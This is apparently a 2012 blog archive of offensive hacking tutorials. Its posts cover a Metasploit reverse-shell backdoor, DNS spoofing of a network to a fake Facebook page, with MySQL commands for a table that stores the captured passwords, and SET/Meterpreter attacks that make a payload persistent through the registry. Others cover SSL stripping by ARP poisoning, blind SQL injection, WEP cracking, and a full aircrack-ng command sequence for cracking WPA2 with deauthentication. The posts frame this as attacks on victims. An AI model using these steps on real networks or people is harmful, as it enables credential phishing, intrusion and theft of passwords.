Today we are going to be hacking a remote computer using the Metasploit Framework!

Hacking a computer in a local area network (LAN) is quite simple since we can issue direct connections among little traffic. Hacking a remote computer on a wide area network, on the other hand, isn’t as simple as you would imagine…

Things to consider during the attack:

  • Anti Virus
  • Firewall
  • Intrusion Detection System
  • Intrusion Prevention System
  • Latency
  • Routers

Let’s face it: it’s a wild west out there… anything goes. All these devices will surely slow down the attack or perhaps even completely prevent it!

In order to make sure the attack endures this harsh environment we need to account for some type of encryption on our part; for this we will use vanish (seen previously) to create a backdoor. Let’s use a reverse TCP connection to the secure HTTP port (443) back on the attacker.

This port will need to be forwarded if it is a routed network (as most are)… you can see how to do this in the video.

Once the victim executes this backdoor he will trigger a connection back to the attacker’s machine (forwarded on the public IP address of course).

Since most routers allow connections on ports 80 and 443, using this payload should be fine.

Click here to download vanish: [ DOWNLOAD ]

Check out the video!


P.S.: The settings shown are the ones that I played with and managed to get to work; if you have other payloads or parameters, etc. that were useful to you, feel free to share in the comments section below!

Source : http://technicdynamic.com/2012/03/hacking-a-remote-computer-using-metasploit-framework/

Category: # TechnicDynamic Tutorials | Views: 4574 | Added by: Administrator | Date: 2012-04-08 | Comments (0)

DNS Spoofing whole Network (Wireless)

Following the configuration of Ettercap, dnsspoof, or any other tool it’s time to think of an Attack Vector.

Most attacks give out too many flags; from a security point of view, the most specialized ones are also the most worrying ones.

This time we are gonna see how to spoof the whole network’s DNS and redirect specific traffic to our own hosted server.

This server emulates a fake Facebook page along with a MySQL database to store all the passwords, and displays a "we are in maintenance" message.

If you would like to try it, all you have to do is connect to MySQL (on Backtrack default password is ‘toor’):

  • mysql -u root -p
  • Enter password: toor
  • create database facebook;
  • USE facebook;
  • create table content(username VARCHAR(64), password VARCHAR(64));

Start apache and run Ettercap, or arpspoof/dnsspoof, whatever you like. :)

Here’s the link for the fake Facebook Project: [ DOWNLOAD ]

Check the video out!


Category: # TechnicDynamic Tutorials | Views: 1786 | Added by: Administrator | Date: 2012-03-23 | Comments (0)

Ettercap: DNS Spoof Configuration

So recently I’ve been trying to run the DNS Spoof plugin from ettercap and kept getting "Dissector DNS not supported" as soon as I ran the program.

After searching I found the original cause of the problem: a bug in the amd64 (64-bit) architecture.

So the solution was simple: to use the 32-bit version for now, until they develop a working version for amd64.

On to the video, this time we are simply going to host a server, spoof the DNS to redirect ALL TRAFFIC to our server…

Watch in 1080p!


Category: # TechnicDynamic Tutorials | Views: 1423 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

This time we are owning a fully patched XP box just to show the power of Social Engineering Toolkit combined with a dns spoof technique (ettercap).

Attacker: Backtrack 5 R1 (GNOME-32)
Victim: Windows XP SP3 Fully Patched

Tools: S.E.T., Ettercap & Metasploit

Check out the teaser video and expect more on this soon :)


Category: # TechnicDynamic Tutorials | Views: 1294 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

Following up on the last post, we are gonna take it a little further this time…

Attacker: Backtrack 5 R1 Gnome 32
Victim: Windows XP sp3 Fully Patched

We will spoof the network, this time using arpspoof & dnsspoof just because they provide greater finesse! :D
For the Social Engineering Toolkit (SET) attack, I am going to use a custom template for Facebook (seen in an earlier post) since it reduces loading time compared to the cloned pages by S.E.T.

For the payload I chose the Meterpreter session in order to upload a file and make the victim’s Windows machine load that file every time the computer starts.
To achieve this we modify the registry of the XP box via a VNC session.

Enough Talk, let’s check that video in hi-def:

Song: Victor Munhoz & Endo – Funky 2 (JPhil Remix)


Category: # TechnicDynamic Tutorials | Views: 1153 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

I noticed a lot of newcomers have problems adapting to Backtrack Linux right away, since they don’t know basic functionality and commands. So I’ve decided to make this video as a starting point to show some of what is possible on Windows.

In this tutorial we will be using Cain & Abel to sniff SSL passwords. The user has to agree to a fake certificate in this scenario. Luckily most users almost always agree without even looking at it. :)

If you are familiar with Linux I recommend using it instead, since it is much more networking oriented and possesses a lot more tools (all free).

We do an ARP Poison on the network to capture all the traffic between router (default gateway) and host.

Check it out (high quality)!


Category: # TechnicDynamic Tutorials | Views: 1723 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

If you think HTTPS is secure, think again.

This time we will be showing a seamless sniffing attack, where the attacker injects the whole network using ARP poisoning to become the man-in-the-middle.

After poisoning the network, all SSL / HTTPS traffic is redirected to a normal HTTP (port 10000) without the targets even noticing anything. To top it off we display a lock icon on the webpage to make it seem like an HTTPS page.

Check out the video in high quality and leave feedback to TechnicDynamic@gmail.com !

Song: Oblivion, Endo – The Mente


Category: # TechnicDynamic Tutorials | Views: 853 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

This time we will be taking a look at the true & false SQL injection method.

Although most programmers have already noticed this flaw and taken the right countermeasures to prevent it, due to the large number of websites going up every day, there are still many vulnerable pages.

This method is simple overall; however, some knowledge of programming and SQL will be handy.

Basically, we want to locate a dynamic field on the website and make it return either true or false. So if we insert a SQL statement asking the database to return a specific number of tables and it returns false, we know the database has fewer tables than what we suggested.

That is the main logic behind the method!

Identifying whether the return was true or false is, mostly, simple. Wherever the dynamic content should be on the website, it will be missing (either blank, or, upon viewing the source code of the page, one should see: "You have an error…").

Check out the video:



Category: # TechnicDynamic Tutorials | Views: 1234 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Still today, it is very common to see small & medium businesses using low security settings on their networks.

In this educational video, we will be looking at how an attacker would gain front door access to a network just by monitoring enough data packets to eventually crack the password.

The wireless network is in default configuration using the WEP encryption method.

Let’s take a look at the gear:

  • Wireless Network Interface Card: Alfa AWUS036NH
  • Computer using Linux Backtrack 5 Operating System

You can use any Linux distribution you like, but I recommend Backtrack because it comes with everything you will need pre-installed. For more information on how to install Backtrack to your computer or run a Live CD, visit their website by clicking on their logo image. Most wireless network interface cards are automatically identified by Backtrack as well.

Make sure you watch the video in high quality (1080p) so you can see the commands:

If you’re relatively new to Linux, I would recommend downloading the commands file and going through each step following the video. Remember to replace the devices in parentheses with the proper device. Example in video: (wireless device) = wlan0.


Songs used for the video credited to Mt. Eden

Thank you for watching and stay tuned for the next video! :)

Category: # TechnicDynamic Tutorials | Views: 730 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

It’s fair to say WPA 2 has done a lot for wireless networks.

It’s made them more secure, that’s for sure. However, the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:

  • 1. Put wireless interface down, spoof the MAC address (optional) and put wireless interface in monitor mode.
    • ifconfig wlan0 down
    • macchanger --mac 00:22:44:66:88:00 wlan0
    • airmon-ng start wlan0
  • 2. Start sniffing the target wireless network on the specific channel, write capture to file.
    • airodump-ng -c 1 --bssid <Network MAC Addr.> -w <Capture File> mon0
  • 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
    • aireplay-ng -0 0 -a <Network MAC Addr.> -h <Your MAC Addr.> -c <Client MAC Addr.> mon0
  • 4. Now you are ready to crack using the WPA handshake and your wordlist.
    • aircrack-ng --bssid <Network MAC Addr.> -w <Wordlist> <Capture File>

Note: Replace the content in angle brackets (underlined in the original) on your own execution.

For further details, check out the video in high quality:


Song: Scalameriya – Memento Mori
Category: # TechnicDynamic Tutorials | Views: 1227 | Added by: Administrator | Date: 2012-03-22 | Comments (0)
